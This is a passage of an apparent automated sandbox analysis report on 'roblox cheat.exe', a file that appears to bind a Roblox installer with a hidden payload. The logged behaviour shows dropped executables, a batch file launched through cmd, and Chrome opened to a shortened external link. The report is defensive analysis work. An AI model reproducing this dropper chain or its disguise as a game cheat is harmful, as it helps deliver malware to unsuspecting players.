-and-script-behaviors2000DotNET-Framework-reliant-components-Run-components-signed-with-Authenticode2001DotNET-Framework-reliant-components-Run-components-not-signed-with-Authenticode2004DotNET-Framework-Reliant-Components-Permissions-for-Components-with-Manifests2007Miscellaneous-Open-files-based-on-content-not-file-extension2100Miscellaneous-Web-sites-in-less-privileged-web-content-zone-can-navigate-into-this-zone2101Miscellaneous-Allow-script-initiated-windows-without-size-or-position-constraints2102Scripting-Allow-status-bar-updates-via-script2103Miscellaneo
            Source: roblox cheat.exeString found in binary or memory: Automatically logon with current username and passwordPrompt for user name and passwordAutomatic logon only in the Intranet zoneAnonymous logonDisableHigh SafetyEnablePromptAdministrator approvedNotReachableWifiWiredActiveX-controls-and-plug-ins-Download-signed-ActiveX-controls1001ActiveX-controls-and-plug-ins-Download-unsigned-ActiveX-controls1004ActiveX-controls-and-plug-ins-Run-ActiveX-controls-and-plug-ins1200ActiveX-controls-and-plug-ins-Initialize-and-script-ActiveX-controls-not-marked-as-safe-for-scripting1201Miscellaneous-Allow-scripting-of-Internet-Explorer-Web-browser-control1206ActiveX-controls-and-plug-ins-Allow-previously-unused-ActiveX-controls-to-run-without-prompt1208ActiveX-controls-and-plug-ins-Allow-Scriptlets1209ActiveX-controls-and-plug-ins-ActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrictions120AActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrict-ions120BScripting-Active-scripting1400Scripting-Scripting-of-Java-applets1402ActiveX-controls-and-plug-ins-Script-ActiveX-controls-marked-as-safe-for-scripting1405Miscellaneous-Access-data-sources-across-domains1406Scripting-Allow-Programmatic-clipboard-access1407Scripting-Enable-XSS-Filter1409Miscellaneous-Submit-non-encrypted-form-data1601Downloads-Font-download1604Run-Java1605Miscellaneous-Userdata-persistence1606Miscellaneous-Navigate-sub-frames-across-different-domains1607Miscellaneous-Allow-META-REFRESH1608Miscellaneous-Display-mixed-content1609Miscellaneous-Include-local-directory-path-when-uploading-files-to-a-server160AMiscellaneous-Installation-of-desktop-items1800Miscellaneous-Drag-and-drop-or-copy-and-paste-files1802Downloads-File-Download1803Miscellaneous-Launching-programs-and-files-in-an-IFRAME1804Launching-programs-and-files-in-webview1805Miscellaneous-Launching-applications-and-unsafe-files1806Miscellaneous-Use-Pop-up-Blocker1809Allow-OpenSearch-queries-in-Windows-Explorer180EAllow-previewing-and-custom-thumbnails-of-OpenSearch-query-results-in-Windows-Explorer180FUser-Authentication-Logon1A00Allow-persistent-cookies-that-are-stored-on-your-computer1A02Allow-per-session-cookies-not-stored1A03Miscellaneous-Dont-prompt-for-client-certificate-selection-when-no-certificates-or-only-one-certificate-exists1A04Allow-3rd-party-persistent-cookies1A05Allow-3rd-party-session-cookies1A06Miscellaneous-Software-channel-permissions1E05ActiveX-controls-and-plug-ins-Binary-and-script-behaviors2000DotNET-Framework-reliant-components-Run-components-signed-with-Authenticode2001DotNET-Framework-reliant-components-Run-components-not-signed-with-Authenticode2004DotNET-Framework-Reliant-Components-Permissions-for-Components-with-Manifests2007Miscellaneous-Open-files-based-on-content-not-file-extension2100Miscellaneous-Web-sites-in-less-privileged-web-content-zone-can-navigate-into-this-zone2101Miscellaneous-Allow-script-initiated-windows-without-size-or-position-constraints2102Scripting-Allow-status-bar-updates-via-script2103Miscellaneo
            Source: roblox cheat.exeString found in binary or memory: ShowFlashMessage('Worst: ' + (end-start).toFixed(2) + 'ms ' + TimerInfo[Token].name, 100);
            Source: roblox cheat.exeString found in binary or memory: EnabledByDefaultEnabledSetByGroupPolicyDisabledSetByGroupPolicyEnabledSetByDefaultPolicyDisabledSetByDefaultPolicySOFTWARE\Policies\Microsoft\EdgeUpdateWebView2 Runtime Not InstalledInstallWebView2RuntimeTimeoutMsUpdate{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}Install{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}InstallDefault108.0.1462.37C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\WebView2Runtime.cppMicrosoftEdgeWebview2Setup.exe /silent /installFailed to create %sFailed to wait %sFailed to get exit processExitCode %s%s exited with failure processExitCode: %u/silent /installrunasFailed to admin execute %sFailed to admin wait %sFailed to admin get exit processExitCode %sSetDefaultDllDirectoriesC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\DLLHelpers.cppfailed to load message resource %uC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\LocalizedText.cppfailed to lock resource %ufailed to find message resource %ufailed to find RCDATA resource %ufailed to get size of resource %uNULL argumentC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\DirectXVersion.cppD3D11CreateDeviced3d11.dllFailed to load function D3D11CreateDeviceFailed to create directX device
            Source: roblox cheat.exeString found in binary or memory: iphlpapi.dllif_nametoindexws2_32FreeAddrInfoExWGetAddrInfoExCancelGetAddrInfoExWLoadLibraryExA\/AddDllDirectoryh1h2h3%10s %512s %u %10s %512s %u "%64[^"]" %u %urt%s %s%s%s %u %s %s%s%s %u "%d%02d%02d %02d:%02d:%02d" %u %d
            Source: roblox cheat.exeString found in binary or memory: set-addPolicy
            Source: roblox cheat.exeString found in binary or memory: id-cmc-addExtensions
            Source: unknownProcess created: C:\Users\user\Desktop\roblox cheat.exe "C:\Users\user\Desktop\roblox cheat.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2184,i,14828535627695779647,3084874413555431357,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" Jump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2184,i,14828535627695779647,3084874413555431357,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\roblox cheat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: roblox cheat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: roblox cheat.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: roblox cheat.exeStatic file information: File size 6410752 > 1048576
            Source: roblox cheat.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x60fc00
            Source: roblox cheat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: roblox cheat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: \rat\BitJoiner\payload\obj\Debug\payload.pdb source: roblox cheat.exe
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: roblox cheat.exe, cheatinstaler cheatinstalerF6R54T.exe.0.dr
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
